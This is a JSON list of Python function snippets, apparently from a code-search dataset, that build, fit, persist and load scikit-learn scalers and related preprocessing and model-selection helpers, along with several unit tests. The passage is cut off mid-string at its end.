[ "def __create_scaler_type(self):\n\n if self.scalertype == \"standard\":\n return StandardScaler()\n if self.scalertype == \"minmax\":\n return MinMaxScaler(feature_range=self.featureRange)\n assert True, \"An error occured when creating a scaler of type '{}'\".format(self.scalertype)", "def get_normalizer(data):\n scaler = StandardScaler().fit(data)\n return scaler", "def _load_scaler(self, scaler_file):\n assert isinstance(scaler_file, str),\\\n \"scaler_file not entered as string.\"\n self.scaler = joblib.load(file_path(scaler_file))\n return", "def from_name(cls: Type[AutoScalerPolicy], name: str) -> AutoScalerPolicy:\n try:\n return cls[name.upper()]\n except KeyError:\n raise RuntimeError(f'Unknown {cls.__name__} \\'{name}\\'')", "def any_preprocessing(name):\n return hp.choice('%s' % name, [\n [pca(name + '.pca')],\n [standard_scaler(name + '.standard_scaler')],\n [min_max_scaler(name + '.min_max_scaler')],\n [normalizer(name + '.normalizer')],\n # -- not putting in one-hot because it can make vectors huge\n #[one_hot_encoder(name + '.one_hot_encoder')],\n []\n ])", "def test_scaler_attribute_type(self, scaler, scaler_type):\n\n x = ScalingTransformer(columns=\"b\", scaler=scaler)\n\n assert (\n type(x.scaler) is scaler_type\n ), f\"unexpected scaler set in init for {scaler}\"", "def get_norm(name):\n if name in _metrics.keys():\n return _metrics[name]\n raise ValueError(\"Name '{}' does not stand for any known norm\", name)", "def get_clf_and_scaler(data_path, pickle_file='./data/classifier.p'):\n clf, scaler = load_model(pickle_file)\n if clf == None:\n clf, scaler = train_classifier(data_path)\n save_model(clf, scaler, pickle_file)\n\n return clf, scaler", "def compute_scaler(args):\n workspace = args.workspace\n data_type = args.data_type\n dir_name = args.dir_name \n # Load data. \n t1 = time.time()\n hdf5_path = os.path.join(workspace, \"packed_features\", \"spectrogram\", data_type, dir_name, \"data.h5\")\n with h5py.File(hdf5_path, 'r') as hf:\n x = hf.get('x') \n x = np.array(x) # (n_segs, n_concat, n_freq)\n \n # Compute scaler. \n (n_segs, n_concat, n_freq) = x.shape\n x2d = x.reshape((n_segs * n_concat, n_freq))\n scaler = preprocessing.StandardScaler(with_mean=True, with_std=True).fit(x2d)\n print(scaler.mean_)\n print(scaler.scale_)\n \n # Write out scaler. \n out_path = os.path.join(workspace, \"packed_features\", \"spectrogram\", data_type, dir_name, \"scaler.p\")\n create_folder(os.path.dirname(out_path))\n pickle.dump(scaler, open(out_path, 'wb'))\n \n print(\"Save scaler to %s\" % out_path)\n print(\"Compute scaler finished! %s s\" % (time.time() - t1,))", "def train_scaler(dset, varname=None, row_dim='time', transform=True):\n \n try: \n from dask_ml.preprocessing import StandardScaler\n except: \n from sklearn.preprocessing import StandardScaler\n \n dset = dset[varname]\n space_dims = tuple(x for x in dset.dims if x != row_dim)\n dset_stack = dset.stack(z=space_dims) \n scaler = StandardScaler()\n if transform: \n data_std = scaler.fit_transform(dset_stack.data)\n dset_stack.data = data_std\n dset = dset_stack.unstack()\n return dset, scaler\n else:\n return None, scaler", "def compute_scaler(data_type):\n workspace = config.workspace\n\n if data_type == 'train':\n snr = config.Tr_SNR\n \n # Load data. \n t1 = time.time()\n hdf5_path = os.path.join(workspace, \"packed_features\", \"spectrogram\", data_type, \"%ddb\" % int(snr), \"data.h5\")\n with h5py.File(hdf5_path, 'r') as hf:\n x = hf.get('x') \n x = np.array(x) # (n_segs, n_concat, n_freq)\n \n # Compute scaler. \n (n_segs, n_concat, n_freq) = x.shape\n x2d = x.reshape((n_segs * n_concat, n_freq))\n scaler = StandardScaler(with_mean=True, with_std=True).fit(x2d)\n# print(scaler.mean_)\n# print(scaler.scale_)\n \n # Write out scaler. \n out_path = os.path.join(workspace, \"packed_features\", \"spectrogram\", data_type, \"%ddb\" % int(snr), \"scaler.p\")\n create_folder(os.path.dirname(out_path))\n pickle.dump(scaler, open(out_path, 'wb'))\n \n print(\"Save scaler to %s\" % out_path)\n print(\"Compute scaler finished! %s s\" % (time.time() - t1,))", "def get_sklearn_model(x):\n if is_sklearn_model(x):\n return x # already a valid model\n elif type(x) is dict:\n if hasattr(x, 'model'):\n return get_sklearn_model(x['model'])\n else:\n return None\n elif type(x) is str:\n # noinspection PyBroadException\n try:\n return get_sklearn_model(eval(x))\n except:\n pass\n return None", "def _scaling_model_from_dict(obj):\n for entry_point in pkg_resources.iter_entry_points(\"dxtbx.scaling_model_ext\"):\n if entry_point.name == obj[\"__id__\"]:\n return entry_point.load().from_dict(obj)", "def build_scale_controller(name: str, kwargs=None) -> Union[ScaleControllerBase, None]:\n if not name or name == 'none':\n return None\n controller_choices = {\n 'learn': LearnableScaleController,\n 'fix': FixedScaleController,\n 'relu': ReluScaleController,\n 'exp': ExpScaleController,\n 'softmax': SoftmaxScaleController,\n 'norm': NormalizeScaleController,\n }\n if name not in controller_choices:\n raise KeyError('Wrong scale controller name.')\n controller_type = controller_choices[name]\n return controller_type(**kwargs) if kwargs else controller_type()", "def set_scalers(self, df):\n print_info('Setting scalers with training data...')\n\n column_definitions = self.getcolumn_definition()\n id_column = get_single_col_by_input_type(InputTypes.ID, column_definitions)\n target_column = get_single_col_by_input_type(InputTypes.TARGET, column_definitions)\n\n # Format real scalers\n real_inputs = extract_cols_from_data_type(\n DataTypes.REAL_VALUED, column_definitions,\n {InputTypes.ID, InputTypes.TIME})\n\n # Initialise scaler caches\n self.real_scalers = {}\n self.target_scaler = {}\n identifiers = []\n for identifier, sliced in df.groupby(id_column):\n\n if len(sliced) >= self._time_steps:\n\n data = sliced[real_inputs].values\n targets = sliced[[target_column]].values\n self.real_scalers[identifier] = sk_preprocessing.StandardScaler().fit(data)\n self.target_scaler[identifier] = sk_preprocessing.StandardScaler().fit(targets)\n identifiers.append(identifier)\n\n # Format categorical scalers\n categorical_inputs = extract_cols_from_data_type(\n DataTypes.CATEGORICAL, column_definitions,\n {InputTypes.ID, InputTypes.TIME})\n\n categorical_scalers = {}\n num_classes = []\n for col in categorical_inputs:\n # Set all to str so that we don't have mixed integer/string columns\n srs = df[col].apply(str)\n categorical_scalers[col] = sk_preprocessing.LabelEncoder().fit(srs.values)\n num_classes.append(srs.nunique())\n\n # Set categorical scaler outputs\n self._cat_scalers = categorical_scalers\n self._num_classes_per_cat_input = num_classes\n\n # Extract identifiers in case required\n self.identifiers = identifiers", "def load_X_scaler(self, out_tag='lstm_scaler'): \n\n print ('loading X scaler: models/{}_X_scaler.pkl'.format(out_tag))\n self.X_scaler = load(open('models/{}_X_scaler.pkl'.format(out_tag),'rb'))", "def __create_scaler(self):\n \n self.scaler = {}\n for component in self.comp_list:\n self.scaler[component] = self.__create_scaler_type()", "def scale_data(x: np.ndarray, scaler=None) -> Tuple[np.ndarray, object]:\n original_shape = x.shape\n\n # reshape data to 2d array\n x = x.reshape((x.shape[0], -1))\n\n if scaler is None:\n scaler = StandardScaler().fit(x)\n\n x = scaler.transform(x)\n\n # reshape back\n x = x.reshape(original_shape)\n return x, scaler", "def _get_classifier_to_name(self, classifier_name: str) -> object:\n\n classifiers = all_estimators('classifier')\n clf_class = [clf[1] for clf in classifiers if clf[0] == classifier_name]\n\n if clf_class:\n return clf_class[0]()\n \n else:\n msg = f'The passed classifier name \\'{classifier_name}\\' has no corresponding classifier, please make sure that the passed name corresponds to an actual sklearn classifier.'\n raise NameError(msg)", "def get_X_scaler(self, X_train, out_tag='lstm_scaler', save=True):\n\n X_scaler = StandardScaler()\n X_scaler.fit(X_train.values)\n self.X_scaler = X_scaler\n if save:\n print('saving X scaler: models/{}_X_scaler.pkl'.format(out_tag))\n dump(X_scaler, open('models/{}_X_scaler.pkl'.format(out_tag),'wb'))", "def test_scaler_initialised_with_scaler_kwargs(\n self, mocker, scaler, scaler_type_str, scaler_kwargs_value\n ):\n\n mocked = mocker.patch(\n f\"sklearn.preprocessing.{scaler_type_str}.__init__\", return_value=None\n )\n\n ScalingTransformer(\n columns=\"b\", scaler=scaler, scaler_kwargs=scaler_kwargs_value\n )\n\n assert mocked.call_count == 1, \"unexpected number of calls to init\"\n\n call_args = mocked.call_args_list[0]\n call_pos_args = call_args[0]\n call_kwargs = call_args[1]\n\n assert (\n call_pos_args == ()\n ), f\"unexpected positional args in {scaler_type_str} init call\"\n\n assert (\n call_kwargs == scaler_kwargs_value\n ), f\"unexpected kwargs in {scaler_type_str} init call\"", "def from_config(cls, config: dict):\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n\n _scaler_config = config['config'].pop('scaler_to_standardize_')\n setattr(scaler, '_scaler', StandardScaler.from_config(_scaler_config))\n\n rescaler = config['config'].pop('rescaler_config_')\n if rescaler:\n setattr(scaler, 'rescaler_', MinMaxScaler.from_config(rescaler))\n else:\n setattr(scaler, 'rescaler_', None)\n\n pre_standardizer = config['config'].pop('pre_center_config_')\n if pre_standardizer:\n setattr(scaler, 'pre_centerer_', Center.from_config(pre_standardizer))\n else:\n setattr(scaler, 'pre_centerer_', None)\n\n for attr, attr_val in config['config'].items():\n setattr(scaler, attr, attr_val)\n\n if isinstance(scaler.lambdas_, float):\n scaler.lambdas_ = [scaler.lambdas_]\n return scaler", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def set_scalers(self, df):\n print('Setting scalers with training data...')\n\n column_definitions = self.get_column_definition()\n id_column = utils.get_single_col_by_input_type(InputTypes.ID,\n column_definitions)\n target_column = utils.get_single_col_by_input_type(InputTypes.TARGET,\n column_definitions)\n\n # Extract identifiers in case required\n self.identifiers = list(df[id_column].unique())\n\n # Format real scalers\n real_inputs = utils.extract_cols_from_data_type(\n DataTypes.REAL_VALUED, column_definitions,\n {InputTypes.ID, InputTypes.TIME})\n\n data = df[real_inputs].values\n self._real_scalers = sklearn.preprocessing.StandardScaler().fit(data)\n self._target_scaler = sklearn.preprocessing.StandardScaler().fit(\n df[[target_column]].values) # used for predictions\n\n # Format categorical scalers\n categorical_inputs = utils.extract_cols_from_data_type(\n DataTypes.CATEGORICAL, column_definitions,\n {InputTypes.ID, InputTypes.TIME})\n\n categorical_scalers = {}\n num_classes = []\n for col in categorical_inputs:\n # Set all to str so that we don't have mixed integer/string columns\n srs = df[col].apply(str)\n categorical_scalers[col] = sklearn.preprocessing.LabelEncoder().fit(\n srs.values)\n num_classes.append(srs.nunique())\n\n # Set categorical scaler outputs\n self._cat_scalers = categorical_scalers\n self._num_classes_per_cat_input = num_classes", "def scaled_component(self, key):\n\n if key in self.components:\n dat = self.components[key] \n # Aliases\n elif key in component_from_alias:\n comp = component_from_alias[key]\n if comp in self.components:\n dat = self.components[comp] \n else:\n # Component not present, make zeros\n return np.zeros(self.shape)\n else:\n raise ValueError(f'Component not available: {key}')\n \n # Multiply by scale factor\n factor = self.factor \n \n if factor != 1:\n return factor*dat\n else:\n return dat", "def test_scaler_fit_call(self, mocker, scaler, scaler_type_str):\n\n df = d.create_df_3()\n\n x = ScalingTransformer(\n columns=[\"b\", \"c\"], scaler=scaler, scaler_kwargs={\"copy\": True}\n )\n\n mocked = mocker.patch(\n f\"sklearn.preprocessing.{scaler_type_str}.fit\", return_value=None\n )\n\n x.fit(df)\n\n assert mocked.call_count == 1, \"unexpected number of calls to scaler fit\"\n\n call_args = mocked.call_args_list[0]\n call_pos_args = call_args[0]\n call_kwargs = call_args[1]\n\n expected_positional_args = (df[[\"b\", \"c\"]],)\n\n h.assert_equal_dispatch(\n expected=expected_positional_args,\n actual=call_pos_args,\n msg=f\"unexpected positional args in {scaler_type_str} fit call\",\n )\n\n assert call_kwargs == {}, f\"unexpected kwargs in {scaler_type_str} fit call\"", "def get_normalization_layer(name: str, ds: tf.data.Dataset, weighted=False):\r\n # Normalization layer for the feature\r\n normalizer = tf.keras.layers.experimental.preprocessing.Normalization(axis=None)\r\n\r\n # Dataset that only yields specified feature\r\n if weighted:\r\n feature_ds = ds.map(lambda x, y, w: x[name])\r\n else:\r\n feature_ds = ds.map(lambda x, y: x[name])\r\n\r\n # Adapt the layer to the data scale\r\n normalizer.adapt(feature_ds)\r\n\r\n return normalizer", "def __init__(self) -> None:\n self.name = \"minmaxScaler\"\n self.min = 0\n self.max = 0", "def test_scaler():\n raw = io.read_raw_fif(raw_fname)\n events = read_events(event_name)\n picks = pick_types(raw.info, meg=True, stim=False, ecg=False,\n eog=False, exclude='bads')\n picks = picks[1:13:3]\n\n epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,\n baseline=(None, 0), preload=True)\n epochs_data = epochs.get_data()\n scaler = Scaler(epochs.info)\n y = epochs.events[:, -1]\n\n X = scaler.fit_transform(epochs_data, y)\n assert_true(X.shape == epochs_data.shape)\n X2 = scaler.fit(epochs_data, y).transform(epochs_data)\n assert_array_equal(X2, X)\n # these should be across time\n assert_allclose(X.std(axis=-2), 1.)\n assert_allclose(X.mean(axis=-2), 0., atol=1e-12)\n\n # Test inverse_transform\n Xi = scaler.inverse_transform(X, y)\n assert_array_almost_equal(epochs_data, Xi)\n\n for kwargs in [{'with_mean': False}, {'with_std': False}]:\n scaler = Scaler(epochs.info, **kwargs)\n scaler.fit(epochs_data, y)\n assert_array_almost_equal(\n X, scaler.inverse_transform(scaler.transform(X)))\n # Test init exception\n assert_raises(ValueError, scaler.fit, epochs, y)\n assert_raises(ValueError, scaler.transform, epochs, y)", "def scale_data(x, y, x_scale_f = '../saved_models/scalers/9_params_21_2_x_scaler.pkl', y_scale_f = '../saved_models/scalers/9_params_21_2_y_scaler.pkl', par_slice = range(7) + range(8,9)):\n\tx_scaler = sklearn.externals.joblib.load(x_scale_f)\n\ty_scaler = sklearn.externals.joblib.load(y_scale_f)\n\tx_scaler.transform(x)\n\ty_scaler.transform(y)\n\tx = x[:,par_slice] \n\treturn x, y, x_scaler, y_scaler", "def get_scorer(scoring):\n if isinstance(scoring, str):\n try:\n scorer = SCORERS[scoring]\n except KeyError:\n raise ValueError(\n \"%r is not a valid scoring value. \"\n \"Use sorted(sklearn.metrics.SCORERS.keys()) \"\n \"to get valid options.\" % scoring\n )\n else:\n scorer = scoring\n return scorer", "def from_config(cls, config: dict):\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n for attr, attr_val in config['config'].items():\n setattr(scaler, attr, attr_val)\n return scaler", "def denorm_it(val, scaler):\n # # inverse transform a single value\n newval = scaler.inverse_transform(val.reshape(1, -1))\n return newval", "def set_and_get_scaling_factor(c, default, warning=False, exception=False, hint=None):\n if c.is_indexed():\n raise AttributeError(\n f\"Ambiguous which scaling factor to return for indexed component {c.name}.\"\n )\n sf = get_scaling_factor(c, warning=warning, exception=exception, hint=hint)\n if sf is None:\n sf = default\n set_scaling_factor(c, sf, data_objects=False)\n return sf", "def standard_scaler(X_train, X_validate, X_test):\n\n scaler = StandardScaler().fit(X_train)\n X_train_scaled = pd.DataFrame(scaler.transform(X_train), index = X_train.index, columns = X_train.columns)\n X_validate_scaled = pd.DataFrame(scaler.transform(X_validate), index = X_validate.index, columns = X_validate.columns)\n X_test_scaled = pd.DataFrame(scaler.transform(X_test), index = X_test.index, columns = X_test.columns)\n \n return scaler, X_train_scaled, X_validate_scaled, X_test_scaled", "def scale_model(model,scaleparname='A',scaleval=1):\n model = get_model_instance(model)\n if scaleparname in model.params:\n scaleparname += '1'\n if isinstance(model,FunctionModel1D):\n compclass = CompositeModel1D\n else:\n compclass = CompositeModel\n res = compclass((model,'constant'),operation='*',\n parnames={'C1':scaleparname})\n setattr(res,scaleparname,scaleval)\n return res", "def get_constraint_transform_applied_scaling_factor(c, default=None):\n try:\n sf = c.parent_block().constraint_transformed_scaling_factor.get(c, default)\n except AttributeError:\n sf = default # when there is no suffix\n return sf", "def scale(train, test):\n # fit scaler\n scaler = MinMaxScaler(feature_range=(-1, 1))\n scaler = scaler.fit(train)\n # transform train\n train = train.reshape(train.shape[0], train.shape[1])\n train_scaled = scaler.transform(train)\n # transform test\n test = test.reshape(test.shape[0], test.shape[1])\n test_scaled = scaler.transform(test)\n return scaler, train_scaled, test_scaled", "def fit_scalers(self, df: pd.DataFrame) -> None:\n for feature, scaler in self._scalers.items():\n if feature == \"season\":\n scaler.fit(df[\"season\"].unique().reshape(-1, 1))\n elif feature in FEATURES_TO_SCALE:\n values = np.concatenate((df[f\"home_{feature}\"].values, df[f\"away_{feature}\"].values))\n scaler.fit(np.unique(values).reshape(-1, 1))\n else:\n scaler.fit(df[feature].unique().reshape(-1, 1))", "def test_to_scaler_non_allowed_value_error(self):\n\n with pytest.raises(\n ValueError,\n match=r\"\"\"scaler should be one of; \\['min_max', 'max_abs', 'standard'\\]\"\"\",\n ):\n\n ScalingTransformer(columns=\"b\", scaler=\"zzz\", scaler_kwargs={\"a\": 1})", "def get_preprocessing(name):\n if name not in preprocessing_fn_map.keys():\n raise ValueError('Preprocessing name [%s] was not recognized.' % name)\n\n return preprocessing_fn_map[name].preprocess_image", "def scale_data(x_train: DF, x_test: DF, scaler: object = None) -> tp.Tuple[ARR, ARR]:\n if not scaler:\n scaler = StandardScaler()\n \n scaler.fit(x_train)\n return scaler.transform(x_train), scaler.transform(x_test)", "def get_scorer(scoring, compute=True):\n # This is the same as sklearns, only we use our SCORERS dict,\n # and don't have back-compat code\n if isinstance(scoring, six.string_types):\n try:\n scorer = SCORERS[scoring]\n except KeyError:\n raise ValueError('{} is not a valid scoring value. '\n 'Valid options are {}'.format(scoring,\n sorted(SCORERS)))\n else:\n scorer = scoring\n\n return scorer", "def test_scaler_transform_call(self, mocker, scaler, scaler_type_str):\n\n df = d.create_df_3()\n\n x = ScalingTransformer(\n columns=[\"b\", \"c\"], scaler=scaler, scaler_kwargs={\"copy\": True}\n )\n\n x.fit(df)\n\n mocked = mocker.patch(\n f\"sklearn.preprocessing.{scaler_type_str}.transform\",\n return_value=df[[\"b\", \"c\"]],\n )\n\n x.transform(df)\n\n assert mocked.call_count == 1, \"unexpected number of calls to scaler fit\"\n\n call_args = mocked.call_args_list[0]\n call_pos_args = call_args[0]\n call_kwargs = call_args[1]\n\n expected_positional_args = (df[[\"b\", \"c\"]],)\n\n h.assert_equal_dispatch(\n expected=expected_positional_args,\n actual=call_pos_args,\n msg=f\"unexpected positional args in {scaler_type_str} transform call\",\n )\n\n assert (\n call_kwargs == {}\n ), f\"unexpected kwargs in {scaler_type_str} transform call\"", "def petab_scale_to_amici_scale(scale_str):\n\n if scale_str == 'lin':\n return amici.ParameterScaling_none\n if scale_str == 'log':\n return amici.ParameterScaling_ln\n if scale_str == 'log10':\n return amici.ParameterScaling_log10\n raise ValueError(\"Invalid pscale \" + scale_str)", "def from_json(self, scaler_json):\n\n json_dict=json.loads(scaler_json)\n\n # Basic fields\n for key in ['feature_range', 'copy',\n 'n_features_in_', 'n_samples_seen_']:\n self.__setattr__(key, json_dict[key])\n\n # Some fields need to be numpy arraysget\n for key in ['scale_', 'min_', 'data_min_', 'data_max_', 'data_range_']:\n self.__setattr__(key, np.array(json_dict[key]))", "def dataset_by_name(name):\n return _datasets[name.lower()]", "def get_name():\n return \"SVM\"", "def retrieve_transformer(\n self,\n transformation: str = None,\n param: dict = {},\n df=None,\n random_seed: int = 2020,\n ):\n\n if transformation in (trans_dict.keys()):\n return trans_dict[transformation]\n\n elif transformation in list(have_params.keys()):\n return have_params[transformation](**param)\n\n elif transformation == 'MinMaxScaler':\n from sklearn.preprocessing import MinMaxScaler\n\n return MinMaxScaler()\n\n elif transformation == 'PowerTransformer':\n from sklearn.preprocessing import PowerTransformer\n\n transformer = PowerTransformer(\n method='yeo-johnson', standardize=True, copy=True\n )\n return transformer\n\n elif transformation == 'QuantileTransformer':\n from sklearn.preprocessing import QuantileTransformer\n\n quants = param[\"n_quantiles\"]\n quants = quants if df.shape[0] > quants else int(df.shape[0] / 3)\n param[\"n_quantiles\"] = quants\n return QuantileTransformer(copy=True, **param)\n\n elif transformation == 'StandardScaler':\n from sklearn.preprocessing import StandardScaler\n\n return StandardScaler(copy=True)\n\n elif transformation == 'MaxAbsScaler':\n from sklearn.preprocessing import MaxAbsScaler\n\n return MaxAbsScaler(copy=True)\n\n elif transformation == 'RobustScaler':\n from sklearn.preprocessing import RobustScaler\n\n return RobustScaler(copy=True)\n\n elif transformation == 'PCA':\n from sklearn.decomposition import PCA\n\n # could probably may it work, but this is simpler\n if df.shape[1] > df.shape[0]:\n raise ValueError(\"PCA fails when n series > n observations\")\n transformer = PCA(\n n_components=min(df.shape), whiten=False, random_state=random_seed\n )\n return transformer\n\n elif transformation == 'FastICA':\n from sklearn.decomposition import FastICA\n\n if df.shape[1] > 500:\n raise ValueError(\"FastICA fails with > 500 series\")\n transformer = FastICA(\n n_components=df.shape[1],\n whiten=True,\n random_state=random_seed,\n **param,\n )\n return transformer\n\n elif transformation in ['RollingMean', 'FixedRollingMean']:\n param = 10 if param is None else param\n if not str(param).isdigit():\n window = int(''.join([s for s in str(param) if s.isdigit()]))\n window = int(df.shape[0] / window)\n else:\n window = int(param)\n window = 2 if window < 2 else window\n self.window = window\n if transformation == 'FixedRollingMean':\n transformer = RollingMeanTransformer(window=self.window, fixed=True)\n else:\n transformer = RollingMeanTransformer(window=self.window, fixed=False)\n return transformer\n\n elif transformation in ['SeasonalDifference', 'SeasonalDifferenceMean']:\n if transformation == 'SeasonalDifference':\n return SeasonalDifference(lag_1=param, method='LastValue')\n else:\n return SeasonalDifference(lag_1=param, method='Mean')\n\n elif transformation == 'RollingMean100thN':\n window = int(df.shape[0] / 100)\n window = 2 if window < 2 else window\n self.window = window\n return RollingMeanTransformer(window=self.window)\n\n elif transformation == 'RollingMean10thN':\n window = int(df.shape[0] / 10)\n window = 2 if window < 2 else window\n self.window = window\n return RollingMeanTransformer(window=self.window)\n\n else:\n print(\n f\"Transformation {transformation} not known or improperly entered, returning untransformed df\"\n )\n return EmptyTransformer()", "def scale_on_2d(x2d, scaler):\n return scaler.transform(x2d)", "def __init__(self, predictor, scaler):\n\n # Check arguments\n if predictor is None:\n raise ValueError('Cannot load genotyper predictor `None`')\n\n if scaler is None:\n raise ValueError('Cannot load feature scaler `None`')\n\n if isinstance(predictor, str):\n predictor = joblib.load(predictor)\n\n if isinstance(scaler, str):\n scaler = joblib.load(scaler)\n\n if not isinstance(predictor, SVC):\n raise ValueError('Predictor must be class sklearn.svm.SVC: Found \"{}\"'.format(type(predictor)))\n\n if not isinstance(scaler, StandardScaler):\n raise ValueError(\n 'Scaler must be class sklearn.preprocessing.StandardScaler: Found \"{}\"'.format(type(scaler))\n )\n\n # Set fields\n self.predictor = predictor\n self.scaler = scaler", "def get_prescales(process,path):\n prescale_service = [val for name,val in process.services_().items() if val.type_()==\"PrescaleService\"]\n if prescale_service:\n for para in prescale_service[0].prescaleTable:\n if para.pathName.value()==path.label():\n return para.prescales.value()\n return [1]*max(len(prescale_service[0].lvl1Labels),1)\n else:\n return [1]", "def pre_processing(self, whole_dataset, type=None):\n # for svm\n X = whole_dataset\n if self._scaler == None:\n self._scaler = preprocessing.StandardScaler().fit(X)\n else:\n basic.outputlogMessage('warning, StandardScaler object already exist, this operation will overwrite it')\n self._scaler = preprocessing.StandardScaler().fit(X)\n # save\n joblib.dump(self._scaler, scaler_saved_path)", "def scalers(self):\n sc = StandardScaler() if self.scm == 'ss' else MinMaxScaler()\n sc.fit(self.t)\n return pd.DataFrame(sc.transform(self.t), columns=self.t.columns.values), pd.DataFrame(sc.transform(self.v), columns=self.v.columns.values)", "def from_config(cls, config: dict):\n\n func = cls.deserialize_func(config.pop('func'))\n\n # do not deserialize inverse_func here, it will be done in init method\n scaler = cls(func=func, inverse_func=config.pop('inverse_func'), **cls.deserialize(**config))\n\n setattr(scaler, '_from_config', True)\n\n return scaler", "def get_cls(dataset_name):\n return find_dataset_using_name(dataset_name)", "def scale(self, X_train, X_test):\n\n #X_train, X_test, y_train, y_test = self.split_X_y_sets()\n self.scaler.fit(X_train)\n X_train_sc = self.scaler.transform(X_train)\n X_test_sc = self.scaler.transform(X_test)\n\n return X_train_sc, X_test_sc #, y_train, y_test", "def scale(self, data: np.ndarray):\n if self.scale_type == \"min_max\":\n scaled_data = (data - self.predictor_min) / (\n self.predictor_max - self.predictor_mean\n )\n elif self.scale_type == \"normalize\":\n scaled_data = (data - self.predictor_mean) / (\n self.predictor_max - self.predictor_min\n )\n elif self.scale_type == \"standardize\":\n scaled_data = (data - self.predictor_mean) / self.predictor_std\n elif self.scale_type == \"scale\":\n scaled_data = data - self.predictor_mean\n else:\n scaled_data = data\n return scaled_data", "def any_scale(scale):\n return scale", "def fnScaleFeatures(x_features, scaler=None, save=False):\n base_path = os.path.dirname(os.getcwd())\n # ToDo - Allow ability to read in path to Pickle\n\n # Read Feature Data Dictionary\n # ToDo - clean up and remove the 2\n feature_list = pd.read_csv('{}/mmml/mmml/feature_list2.csv'.format(base_path))\n columns_key = getFeatureDict(feature_list)\n scale_cols = columns_key['scale_cols']\n scale_cols = list(set([x[:-2] for x in scale_cols])) # Remove _H / _A suffixes\n\n x_features = x_features.copy()\n\n # Fit Scaler\n if scaler is None:\n logger.info(\"Fitting Min-Max Scaler\")\n min_max_scaler = preprocessing.MinMaxScaler()\n fitted_scaler = min_max_scaler.fit(pd.DataFrame(x_features[scale_cols]))\n\n # Save Min-Max Scaler\n saveResults(object=fitted_scaler, dir='Model_Objects', file_name='fitted_scaler.pkl')\n\n else:\n logger.info(\"Using Min-Max Scaler passed as argument\")\n fitted_scaler = scaler\n # ToDo - Accomodate path to saved scaler\n\n # Transform DF\n scaled_df = pd.DataFrame(fitted_scaler.transform(x_features[scale_cols]),\n columns=[x+\"_scaled\" for x in scale_cols], index=x_features.index)\n\n # Average of scaled columns\n logger.info(\"Creating average ranking of Massey columns\")\n avg_rank = pd.DataFrame(scaled_df[[x+\"_scaled\" for x in scale_cols]].mean(axis=1), columns=['Avg_Rank'])\n\n scaled_x_features = x_features.merge(avg_rank, left_index=True, right_index=True)\n\n # Save to Pickle\n if save!=False:\n saveResults(object=scaled_x_features, dir='Data/Processed', file_name='{}.pkl'.format(save))\n\n return scaled_x_features, fitted_scaler", "def getscales(self):\n return self.scales", "def get_optim(name: str):\n if name.lower() == 'adam':\n optimizer = torch.optim.Adam\n elif name.lower() == 'adamw':\n optimizer = torch.optim.AdamW\n elif name.lower() == 'sgd':\n optimizer = torch.optim.SGD\n elif name.lower() == 'sgdw':\n from ..learn.optim import SGDW\n optimizer = SGDW\n elif name.lower() == 'nsgd':\n from ..learn.optim import NesterovSGD\n optimizer = NesterovSGD\n elif name.lower() == 'nsgdw':\n from ..learn.optim import NesterovSGDW\n optimizer = NesterovSGDW\n elif name.lower() == 'rmsprop':\n optimizer = torch.optim.rmsprop\n elif name.lower() == 'adagrad':\n optimizer = torch.optim.adagrad\n elif name.lower() == 'amsgrad':\n from ..learn.optim import AMSGrad\n optimizer = AMSGrad\n else:\n raise SynthtorchError(f'Optimizer: \"{name}\" not a valid optimizer routine or not supported.')\n return optimizer", "def _choose_model(self, model_str):\n if model_str == 'lg':\n return(LogisticRegression())\n elif model_str == 'rf':\n return(RandomForestClassifier())\n elif model_str == 'svm':\n # return SVC(C=1, kernel='linear') # linear boundary\n return SVC(C=1, kernel='poly', degree=2) # non-linear boundary\n # return SVC(C=1, kernel='rbf')\n # return SVC(C=1, kernel='sigmoid') # binary classification", "def test_output_from_scaler_transform_set_to_columns(\n self, mocker, scaler, scaler_type_str\n ):\n\n df = d.create_df_3()\n\n x = ScalingTransformer(\n columns=[\"b\", \"c\"], scaler=scaler, scaler_kwargs={\"copy\": True}\n )\n\n x.fit(df)\n\n scaler_transform_output = pd.DataFrame(\n {\"b\": [1, 2, 3, 4, 5, 6, 7], \"c\": [7, 6, 5, 4, 3, 2, 1]}\n )\n\n mocker.patch(\n f\"sklearn.preprocessing.{scaler_type_str}.transform\",\n return_value=scaler_transform_output,\n )\n\n df_transformed = x.transform(df)\n\n h.assert_equal_dispatch(\n expected=scaler_transform_output,\n actual=df_transformed[[\"b\", \"c\"]],\n msg=f\"output from {scaler_type_str} transform not assigned to columns\",\n )", "def get_scaling_type(df_mfactors: pd.DataFrame, cmdl_args):\n eps = 0.9\n normalized_inst_ratio = 0\n\n # Check if there is only one trace\n if len(df_mfactors.index) == 1:\n return 'strong'\n\n for index, row in df_mfactors.iterrows():\n inst_ratio = float(row[MOD_FACTORS_DOC['useful_ins']]) / float(df_mfactors[MOD_FACTORS_DOC['useful_ins']][0])\n proc_ratio = float(row[MOD_FACTORS_DOC['num_processes']]) / float(\n df_mfactors[MOD_FACTORS_DOC['num_processes']][0])\n normalized_inst_ratio += inst_ratio / proc_ratio\n\n # Get the average inst increase. Ignore ratio of first trace (1.0)\n normalized_inst_ratio = (normalized_inst_ratio - 1) / (len(df_mfactors.index) - 1)\n\n scaling_computed = ''\n\n if normalized_inst_ratio > eps:\n scaling_computed = 'weak'\n else:\n scaling_computed = 'strong'\n\n if cmdl_args.scaling == 'auto':\n if cmdl_args.debug:\n print(f'==DEBUG== Detected {scaling_computed} scaling.')\n print('')\n return scaling_computed\n\n if cmdl_args.scaling == 'weak':\n if scaling_computed == 'strong':\n print('==WARNING== Scaling set to weak scaling but detected strong scaling.')\n print('')\n return 'strong'\n\n if cmdl_args.scaling == 'strong':\n if scaling_computed == 'weak':\n print('==WARNING== Scaling set to strong scaling but detected weak scaling.')\n print('')\n return 'strong'\n\n print('==ERROR== Reached undefined control flow state.')\n sys.exit(1)", "def from_name(self, name):\n return self._name_to_loadout.get(name.lower())", "def _call_scale(vecObj, sc):\n res = vecObj.scale(sc)\n return res", "def get_loader(dataset_name, **kwargs):\n if dataset_name == \"rostd\":\n loader = partial_class(ROSTDLoader,\n data_root_dir=\"data/rostd\",\n use_coarse_labels=False)\n elif dataset_name == \"rostd_coarse\":\n loader = partial_class(ROSTDLoader,\n 